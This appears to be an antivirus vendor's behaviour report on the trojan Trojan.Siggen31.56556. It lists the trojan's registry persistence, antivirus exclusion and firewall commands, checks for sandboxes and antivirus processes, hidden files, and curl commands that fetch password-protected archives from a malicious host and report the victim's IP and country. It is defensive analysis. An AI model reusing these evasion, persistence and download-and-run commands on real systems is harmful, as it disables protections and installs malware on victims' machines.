Trojan.Siggen31.56556

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[HKLM\software\microsoft\windows nt\currentversion\winlogon] 'shell' = 'explorer.exe, "%LOCALAPPDATA%\google\chrome\user data\wzone.exe" "%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wloca...

Malicious functions

To complicate detection of its presence in the operating system,

adds antivirus exclusion:

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionProcess '%LOCALAPPDATA%\google\chrome\user data\wzone.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionPath '%LOCALAPPDATA%\google\chrome\user data\wzone.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionProcess '%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionPath '%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe'

Executes the following

'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="windows defender" dir=in action=allow program="%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe" enable=yes

Modifies file system

Creates the following files

%TEMP%\qb0e172d.00\gkey.exe
%TEMP%\cocynqkl.bat
%TEMP%\qb0e1911.39\cnf
nul
%TEMP%\cnf
%TEMP%\7z2201.exe
%ProgramFiles(x86)%\7-zip\7-zip.chm
%ProgramFiles(x86)%\7-zip\descript.ion
%ProgramFiles(x86)%\7-zip\history.txt
%ProgramFiles(x86)%\7-zip\lang\af.txt
%ProgramFiles(x86)%\7-zip\lang\an.txt
%ProgramFiles(x86)%\7-zip\lang\ar.txt
%ProgramFiles(x86)%\7-zip\lang\ast.txt
%ProgramFiles(x86)%\7-zip\lang\az.txt
%ProgramFiles(x86)%\7-zip\lang\ba.txt
%ProgramFiles(x86)%\7-zip\lang\be.txt
%ProgramFiles(x86)%\7-zip\lang\bg.txt
%ProgramFiles(x86)%\7-zip\lang\bn.txt
%ProgramFiles(x86)%\7-zip\lang\br.txt
%ProgramFiles(x86)%\7-zip\lang\ca.txt
%ProgramFiles(x86)%\7-zip\lang\co.txt
%ProgramFiles(x86)%\7-zip\lang\cs.txt
%ProgramFiles(x86)%\7-zip\lang\cy.txt
%ProgramFiles(x86)%\7-zip\lang\da.txt
%ProgramFiles(x86)%\7-zip\lang\de.txt
%ProgramFiles(x86)%\7-zip\lang\el.txt
%ProgramFiles(x86)%\7-zip\lang\en.ttt
%ProgramFiles(x86)%\7-zip\lang\eo.txt
%ProgramFiles(x86)%\7-zip\lang\es.txt
%ProgramFiles(x86)%\7-zip\lang\et.txt
%ProgramFiles(x86)%\7-zip\lang\eu.txt
%ProgramFiles(x86)%\7-zip\lang\ext.txt
%ProgramFiles(x86)%\7-zip\lang\fa.txt
%ProgramFiles(x86)%\7-zip\lang\fi.txt
%ProgramFiles(x86)%\7-zip\lang\fr.txt
%ProgramFiles(x86)%\7-zip\lang\fur.txt
%ProgramFiles(x86)%\7-zip\lang\fy.txt
%ProgramFiles(x86)%\7-zip\lang\ga.txt
%ProgramFiles(x86)%\7-zip\lang\gl.txt
%ProgramFiles(x86)%\7-zip\lang\gu.txt
%ProgramFiles(x86)%\7-zip\lang\he.txt
%ProgramFiles(x86)%\7-zip\lang\hi.txt
%ProgramFiles(x86)%\7-zip\lang\hr.txt
%ProgramFiles(x86)%\7-zip\lang\hu.txt
%ProgramFiles(x86)%\7-zip\lang\hy.txt
%ProgramFiles(x86)%\7-zip\lang\id.txt
%ProgramFiles(x86)%\7-zip\lang\io.txt
%ProgramFiles(x86)%\7-zip\lang\is.txt
%ProgramFiles(x86)%\7-zip\lang\it.txt
%ProgramFiles(x86)%\7-zip\lang\ja.txt
%ProgramFiles(x86)%\7-zip\lang\ka.txt
%ProgramFiles(x86)%\7-zip\lang\kaa.txt
%ProgramFiles(x86)%\7-zip\lang\kab.txt
%ProgramFiles(x86)%\7-zip\lang\kk.txt
%ProgramFiles(x86)%\7-zip\lang\ko.txt
%ProgramFiles(x86)%\7-zip\lang\ku-ckb.txt
%ProgramFiles(x86)%\7-zip\lang\ku.txt
%ProgramFiles(x86)%\7-zip\lang\ky.txt
%ProgramFiles(x86)%\7-zip\lang\lij.txt
%ProgramFiles(x86)%\7-zip\lang\lt.txt
%ProgramFiles(x86)%\7-zip\lang\lv.txt
%ProgramFiles(x86)%\7-zip\lang\mk.txt
%ProgramFiles(x86)%\7-zip\lang\mn.txt
%ProgramFiles(x86)%\7-zip\lang\mng.txt
%ProgramFiles(x86)%\7-zip\lang\mng2.txt
%ProgramFiles(x86)%\7-zip\lang\mr.txt
%ProgramFiles(x86)%\7-zip\lang\ms.txt
%ProgramFiles(x86)%\7-zip\lang\nb.txt
%ProgramFiles(x86)%\7-zip\lang\ne.txt
%ProgramFiles(x86)%\7-zip\lang\nl.txt
%ProgramFiles(x86)%\7-zip\lang\nn.txt
%ProgramFiles(x86)%\7-zip\lang\pa-in.txt
%ProgramFiles(x86)%\7-zip\lang\pl.txt
%ProgramFiles(x86)%\7-zip\lang\ps.txt
%ProgramFiles(x86)%\7-zip\lang\pt-br.txt
%ProgramFiles(x86)%\7-zip\lang\pt.txt
%ProgramFiles(x86)%\7-zip\lang\ro.txt
%ProgramFiles(x86)%\7-zip\lang\ru.txt
%ProgramFiles(x86)%\7-zip\lang\sa.txt
%ProgramFiles(x86)%\7-zip\lang\si.txt
%ProgramFiles(x86)%\7-zip\lang\sk.txt
%ProgramFiles(x86)%\7-zip\lang\sl.txt
%ProgramFiles(x86)%\7-zip\lang\sq.txt
%ProgramFiles(x86)%\7-zip\lang\sr-spc.txt
%ProgramFiles(x86)%\7-zip\lang\sr-spl.txt
%ProgramFiles(x86)%\7-zip\lang\sv.txt
%ProgramFiles(x86)%\7-zip\lang\sw.txt
%ProgramFiles(x86)%\7-zip\lang\ta.txt
%ProgramFiles(x86)%\7-zip\lang\tg.txt
%ProgramFiles(x86)%\7-zip\lang\th.txt
%ProgramFiles(x86)%\7-zip\lang\tk.txt
%ProgramFiles(x86)%\7-zip\lang\tr.txt
%ProgramFiles(x86)%\7-zip\lang\tt.txt
%ProgramFiles(x86)%\7-zip\lang\ug.txt
%ProgramFiles(x86)%\7-zip\lang\uk.txt
%ProgramFiles(x86)%\7-zip\lang\uz-cyrl.txt
%ProgramFiles(x86)%\7-zip\lang\uz.txt
%ProgramFiles(x86)%\7-zip\lang\va.txt
%ProgramFiles(x86)%\7-zip\lang\vi.txt
%ProgramFiles(x86)%\7-zip\lang\yo.txt
%ProgramFiles(x86)%\7-zip\lang\zh-cn.txt
%ProgramFiles(x86)%\7-zip\lang\zh-tw.txt
%ProgramFiles(x86)%\7-zip\license.txt
%ProgramFiles(x86)%\7-zip\readme.txt
%ProgramFiles(x86)%\7-zip\7-zip.dll
%ProgramFiles(x86)%\7-zip\7z.dll
%ProgramFiles(x86)%\7-zip\7z.exe
%ProgramFiles(x86)%\7-zip\7z.sfx
%ProgramFiles(x86)%\7-zip\7zcon.sfx
%ProgramFiles(x86)%\7-zip\7zfm.exe
%ProgramFiles(x86)%\7-zip\7zg.exe
%ProgramFiles(x86)%\7-zip\uninstall.exe
%ALLUSERSPROFILE%\microsoft\windows\start menu\programs\7-zip\7-zip file manager.lnk
%ALLUSERSPROFILE%\microsoft\windows\start menu\programs\7-zip\7-zip help.lnk
%TEMP%\m.7z
%TEMP%\m.bat
%TEMP%\netframework.4.8.7z
%LOCALAPPDATA%\google\chrome\user data\01.txt
%LOCALAPPDATA%\google\chrome\user data\s01.txt
%LOCALAPPDATA%\google\chrome\user data\u05.txt
%LOCALAPPDATA%\google\chrome\user data\wtime.cmd
%LOCALAPPDATA%\google\chrome\user data\1028\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1029\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1031\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1033\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1036\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1040\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1041\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1042\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1045\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1046\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1049\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1055\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\2052\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\3082\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\7z.dll
%LOCALAPPDATA%\google\chrome\user data\7z.exe
%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe
%LOCALAPPDATA%\google\chrome\user data\wzone.exe
%LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\wzone.exe.log
%LOCALAPPDATA%\google\chrome\user data\r01.txt

Sets the 'hidden' attribute to the following files

%LOCALAPPDATA%\google\chrome\user data\01.txt
%LOCALAPPDATA%\google\chrome\user data\s01.txt
%LOCALAPPDATA%\google\chrome\user data\wtime.cmd
%LOCALAPPDATA%\google\chrome\user data\7z.dll
%LOCALAPPDATA%\google\chrome\user data\7z.exe
%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe
%LOCALAPPDATA%\google\chrome\user data\wzone.exe

Network activity

Connects to

'ip##fo.io':443
'c.###titmp.net':443
'gi##ub.com':443
're#########ets.githubusercontent.com':443
'ze###tmp.net':443

TCP

Other

'ip##fo.io':443
'c.###titmp.net':443
'gi##ub.com':443
're#########ets.githubusercontent.com':443

UDP

DNS ASK ip##fo.io
DNS ASK c.###titmp.net
DNS ASK gi##ub.com
DNS ASK re#########ets.githubusercontent.com
DNS ASK ze###tmp.net

Miscellaneous

Creates and executes the following

'%TEMP%\qb0e172d.00\gkey.exe' gffrtr4erhfghfg
'%TEMP%\7z2201.exe' /S
'%ProgramFiles(x86)%\7-zip\7z.exe' x "%TEMP%\m.7z" -o"%LOCALAPPDATA%\Temp" -pconfigvpnG2012885838482012ggg -y
'%ProgramFiles(x86)%\7-zip\7z.exe' x "%TEMP%\NetFramework.4.8.7z" -o"%LOCALAPPDATA%\google\chrome\user data" -pvgfjyghtnhnlfjh7trhjfnhfg -y
'%LOCALAPPDATA%\google\chrome\user data\wzone.exe' "%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wlocale.cmd
'%LOCALAPPDATA%\google\chrome\user data\wzone.exe' "%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe" -yr001
'%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe' -yr001

Executes the following

'<SYSTEM32>\cmd.exe' /C start "" "%TEMP%\qb0E172D.00\gkey.exe" gffrtr4erhfghfg
'<SYSTEM32>\mode.com' 120, 31
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\COCYNQKL.bat" "%TEMP%\qb0E172D.00\gkey.exe" gffrtr4erhfghfg"
'<SYSTEM32>\net.exe' session
'<SYSTEM32>\net1.exe' session
'<SYSTEM32>\cmd.exe' /c wmic path win32_LocalTime Get Day,Month,Year /value
'<SYSTEM32>\wbem\wmic.exe' path win32_LocalTime Get Day,Month,Year /value
'<SYSTEM32>\cmd.exe' /c reg query "hklm\system\currentcontrolset\control\systemInformation" /v "systemproductname"
'<SYSTEM32>\reg.exe' query "hklm\system\currentcontrolset\control\systemInformation" /v "systemproductname"
'<SYSTEM32>\cmd.exe' /c reg query "hklm\system\hardwareconfig\current" /v "systemproductname"
'<SYSTEM32>\reg.exe' query "hklm\system\hardwareconfig\current" /v "systemproductname"
'<SYSTEM32>\cmd.exe' /c tasklist /fi "imagename eq SbieSvc.exe" /fo csv /nh
'<SYSTEM32>\tasklist.exe' /fi "imagename eq SbieSvc.exe" /fo csv /nh
'<SYSTEM32>\reg.exe' query "HKLM\SOFTWARE\Microsoft\Alu" /s /reg:32
'<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Alu" /f /reg:32
'<SYSTEM32>\cmd.exe' /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"
'<SYSTEM32>\reg.exe' query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"
'<SYSTEM32>\cmd.exe' /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"
'<SYSTEM32>\reg.exe' query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"
'<SYSTEM32>\cmd.exe' /c tasklist /fi "imagename eq ekrn.exe" /fo csv /nh
'<SYSTEM32>\tasklist.exe' /fi "imagename eq ekrn.exe" /fo csv /nh
'<SYSTEM32>\cmd.exe' /c tasklist /fi "imagename eq QHActiveDefense.exe" /fo csv /nh
'<SYSTEM32>\tasklist.exe' /fi "imagename eq QHActiveDefense.exe" /fo csv /nh
'<SYSTEM32>\cmd.exe' /c curl https://ipinfo.io/ip -k
'<SYSTEM32>\curl.exe' https://ipinfo.io/ip -k
'<SYSTEM32>\cmd.exe' /c curl https://ipinfo.io/country -k
'<SYSTEM32>\curl.exe' https://ipinfo.io/country -k
'<SYSTEM32>\cmd.exe' /c ver
'<SYSTEM32>\cmd.exe' /S /D /c" ver "
'<SYSTEM32>\find.exe' "6.1"
'<SYSTEM32>\find.exe' "6.2"
'<SYSTEM32>\find.exe' "6.3"
'<SYSTEM32>\cmd.exe' /c curl -k https://c.zeltitmp.net/c01.php --user-agent "c010101"
'<SYSTEM32>\curl.exe' -k https://c.zeltitmp.net/c01.php --user-agent "c010101"
'<SYSTEM32>\curl.exe' -k -o "%TEMP%\7z2201.exe" -L -C - "https://github.com/ip7z/7zip/releases/download/22.01/7z2201.exe" --retry 3
'<SYSTEM32>\curl.exe' -k -o "%TEMP%\m.7z" -L "https://zeltitmp.net/pp/m.7z" --user-agent "cnfvp201"
'<SYSTEM32>\cmd.exe' /K "%TEMP%\m.bat"
'<SYSTEM32>\curl.exe' -k -o "%TEMP%\NetFramework.4.8.7z" -L -C - "https://zeltitmp.net/pp/NetFramework.4.8.7z" --user-agent "cnfvp201" --retry 3
'<SYSTEM32>\attrib.exe' +h +s "%LOCALAPPDATA%\google"
'<SYSTEM32>\reg.exe' add "hklm\software\microsoft\windows nt\currentversion\winlogon" /v "shell" /t reg_sz /d "explorer.exe, \"%LOCALAPPDATA%\google\chrome\user data\wzone.exe\" \"%LOCALAPPDATA%\google\chrome\user ...
'<SYSTEM32>\curl.exe' -k -L "https://zeltitmp.net/pp/cu/cu_p.php?ip=18#.#3.40.66&vos=10&cid=RU&sid=gd54&s=1" --user-agent "cnfvp201"
'<SYSTEM32>\cmd.exe' /c ""%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wlocale.cmd"
'<SYSTEM32>\ping.exe' -n 10 127.0.0.1
'<SYSTEM32>\ping.exe' -n 3 127.0.0.1
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\COCYNQKL.bat" "%TEMP%\qb0E172D.00\gkey.exe" gffrtr4erhfghfg"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c ""%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wlocale.cmd"' (with hidden window)
'%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe' -yr001' (with hidden window)

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней